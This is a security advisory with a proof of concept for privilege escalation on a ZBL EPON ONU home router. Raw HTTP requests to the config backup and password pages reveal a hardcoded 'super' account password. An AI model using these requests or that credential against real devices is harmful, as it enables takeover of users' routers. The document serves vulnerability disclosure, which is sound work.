ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation Exploit Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND)) Product web page: http://www.zblchina.com | http://www.wd-thailand.com Affected version: Firmwre: V100R001 Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE EONU Hardware Version V3.0 Software: V2.46.02P6T5S Main Chip: RTL9607 Master Controller, Copyright (c) R&D Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband router. Desc: The application suffers from a privilege escalation vulnerability. The limited administrative user (admin:admin) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint or the password page and disclose the http super user password. Once authenticated as super, an attacker will be granted access to additional and privileged functionalities. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5467 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php 31.01.2021 -- Get config file and disclose super pwd: --------------------------------------- POST /HG104B-ZG-E.config HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://192.168.1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.1.1/system_configure.asp Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files= ... #web_1 user_web_name=super user_web_password=www168nettv ... Disclose super pwd from system pwd page: ---------------------------------------- GET /system_password.asp Host: 192.168.1.1 ... var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2'); var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin'); ...